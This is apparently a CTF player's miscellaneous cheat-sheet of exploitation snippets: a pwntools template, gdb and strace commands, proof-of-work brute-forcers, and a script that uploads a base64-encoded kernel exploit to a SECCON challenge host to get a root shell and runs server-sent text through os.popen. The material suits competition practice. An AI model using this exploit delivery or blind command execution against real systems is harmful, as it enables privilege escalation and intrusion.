Misc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

from pwn import *
import sys
context.log_level = "debug"

if len(sys.argv) < 2:
    debug = True
else:
    debug = False

if debug:
    p = process("./")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote("",)
    libc = ELF("./libc-2.31.so")

ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a, b)

def debugf(b=0):
    if debug:
        if b:
            gdb.attach(p,"b *$rebase({b})".format(b = hex(b)))
        else:
            gdb.attach(p)
#context.terminal = ['tmux', 'splitw', '-h']

p.interactive()

1

git bisect

1
2
3
4
5
6
7
8

# gdb
set follow-fork-mode [parent|child]		# 设置调试[父进程/子进程]
set detach-on-fork [on|off]				# 未调试进程[继续执行/block在fork位置]
show follow-fork-mode
show detach-on-fork
info inferiors				# 查看正在调试的进程信息
info threads				# 查询线程
thread <thread number>		# 切换线程

1

strace -ff -o test.txt ./your_binary

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

void hexdump(const void *data, size_t size) 
{
    char ascii[17];
    size_t i, j;
    ascii[16] = '\0';
    for (i = 0; i < size; ++i) 
    {
        dprintf(2, "%02X ", ((unsigned char *)data)[i]);
        if (((unsigned char *)data)[i] >= ' ' && ((unsigned char *)data)[i] <= '~') 
        {
            ascii[i % 16] = ((unsigned char *)data)[i];
        } else 
        {
            ascii[i % 16] = '.';
        }
        if ((i + 1) % 8 == 0 || i + 1 == size) 
        {
            dprintf(2, " ");
            if ((i + 1) % 16 == 0) 
            {
                dprintf(2, "|  %s \n", ascii);
            } 
            else if (i + 1 == size) 
            {
                ascii[(i + 1) % 16] = '\0';
                if ((i + 1) % 16 <= 8) 
                {
                    dprintf(2, " ");
                }
                for (j = (i + 1) % 16; j < 16; ++j) 
                {
                    dprintf(2, "   ");
                }
                dprintf(2, "|  %s \n", ascii);
            }
        }
    }
}

1

ropper --file ./vmlinux --nocolor > gadgets.txt

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

#include <stdio.h>
#include <string.h>
#include <memory.h>
#include <stdint.h>
#include <openssl/sha.h>
#define PREFIX_LEN 10
int main(int argc, char const *argv[])
{
	if (argc != 2 || strlen(argv[1]) != PREFIX_LEN)
		return -1;
	uint8_t buf[32];
	uint8_t out[SHA256_DIGEST_LENGTH];
	memcpy(buf, argv[1], PREFIX_LEN);
	for (uint64_t i = 0; i < 0xffffffffffff; ++i)
	{
		sprintf(buf + PREFIX_LEN, "%lu", i);
		SHA256(buf, strlen(buf), out);
		if (out[0] == 0 && out[1] == 0 && out[2] == 0 && (out[3] >> 5) == 0)
		{
			printf("%s\n", buf+10);
			break;
		}
	}
	return 0;
}

// gcc -O2 pow.c -lcrypto && ./a.out pzlYZX5ZEb && rm ./a.out

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

from Crypto.Util.number import getPrime,bytes_to_long
from pwn import *
import urllib.parse as parse
from pwnlib.util.iters import bruteforce
from hashlib import sha256

def brute_force(prefix,s):
    return bruteforce(lambda x:sha256((x+prefix).encode()).hexdigest()==s,string.ascii_letters+string.digits,length=4,method='fixed')


p=remote('202.112.238.82', 10010)
p.recvuntil(b"sha256(XXXX+")
prefix = p.recvn(16).decode()
p.recvuntil(b") == ")
s = p.recvn(64).decode()
log.warning(prefix)
log.warning(s)
p.sendline(brute_force(prefix,s))

p.interactive()

1

docker rm -f `docker ps -a -q`

1

void __usercall xxxxx(char* a1@<rdi>)

1
2

# puts(aStr) ---> puts("str")
change str seg -> r_x

1
2
3

# we cannot compile the exploit using musl-gcc, which produces small binary. The problem is that it seems that musl-gcc cannot find the <linux/xxx.h> header files. I solved this by preprocessing exploit using gcc -E and compiling the preprocessing output using musl-gcc
gcc -E exp.c -o fs/exp.c
musl-gcc -static fs/exp.c -o fs/exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

from pwn import *
import base64
context.log_level = "debug"

with open("./exp", "rb") as f:
    exp = base64.b64encode(f.read())

def do_pow(r):
    cmd = r.recvline()[:-1]
    rr = os.popen(cmd.decode())
    r.sendline(rr.read())

p = remote('babypf.seccon.games',9009)

do_pow(p)
try_count = 1
while True:
    log.info("no." + str(try_count) + " time(s)")
    p.sendline()
    p.recvuntil("/ $")

    count = 0
    for i in range(0, len(exp), 0x200):
        p.sendline("echo -n \"" + exp[i:i + 0x200].decode() + "\" >> /tmp/b64_exp")
        count += 1

    for i in range(count):
        p.recvuntil("/ $")

    p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit")
    p.sendline("chmod +x /tmp/exploit")
    randomization = (try_count % 1024) * 0x100000
    log.info('trying randomization: ' + hex(randomization))
    if not p.recvuntil(b"Rebooting in 1 seconds..", timeout=20):
        break
    log.warn('failed!')
    try_count += 1

log.success('success to get the root shell!')
p.interactive()

1
2

# debug.sh
gdb qemu-system-x86_64 --pid `ps -ef | grep qemu | awk '{print $2}' | head -n 1` -x ./debug.source

1
2
3

# debug.source
b *addr
c

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

set-option -g mouse on                  # 开启鼠标支持
setw -g mode-keys vi                    # 支持vi模式
set-option -s set-clipboard on          # 开启系统剪切板支持

## 鼠标滚轮模拟
# Emulate scrolling by sending up and down keys if these commands are running in the pane
tmux_commands_with_legacy_scroll="nano less more man"
bind-key -T root WheelUpPane \
    if-shell -Ft= '#{?mouse_any_flag,1,#{pane_in_mode}}' \
        'send -Mt=' \
        'if-shell -t= "#{?alternate_on,true,false} || echo \"#{tmux_commands_with_legacy_scroll}\" | grep -q \"#{pane_current_command}\"" \
            "send -t= Up Up Up" "copy-mode -et="'
bind-key -T root WheelDownPane \
    if-shell -Ft = '#{?pane_in_mode,1,#{mouse_any_flag}}' \
        'send -Mt=' \
        'if-shell -t= "#{?alternate_on,true,false} || echo \"#{tmux_commands_with_legacy_scroll}\" | grep -q \"#{pane_current_command}\"" \
            "send -t= Down Down Down" "send -Mt="'

1
2

patchelf --set-interpreter ld_path xxx
patchelf --set-rpath libc_dir xxx